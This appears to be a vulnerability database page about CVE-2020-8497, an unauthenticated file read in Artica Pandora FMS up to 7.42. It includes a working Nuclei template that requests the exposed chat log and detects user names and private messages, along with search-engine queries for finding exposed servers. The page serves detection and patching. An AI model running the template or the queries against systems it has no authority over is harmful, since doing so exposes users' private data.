CVE-2020-8497: Artica Pandora FMS <=7.42 - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Artica Pandora FMS | POC: 已公开

漏洞描述

Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.

PoC代码[已公开]

id: CVE-2020-8497

info:
  name: Artica Pandora FMS <=7.42 - Arbitrary File Read
  author: gy741
  severity: medium
  description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
  remediation: |
    Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
  reference:
    - https://k4m1ll0.com/cve-2020-8497.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8497
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-8497
    cwe-id: CWE-306
    epss-score: 0.34655
    epss-percentile: 0.96889
    cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2020,fms,artica

http:
  - method: GET
    path:
      - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"type"'
          - '"id_user"'
          - '"user_name"'
          - '"text"'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202e652ab532df16dcf0680a5b397217b9802a51c39ff5d2497807873a17dad33b022007ada177d5615bb2a7040fc97f9aa88f55a68ccbe9fa7067f754da62a71a103e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐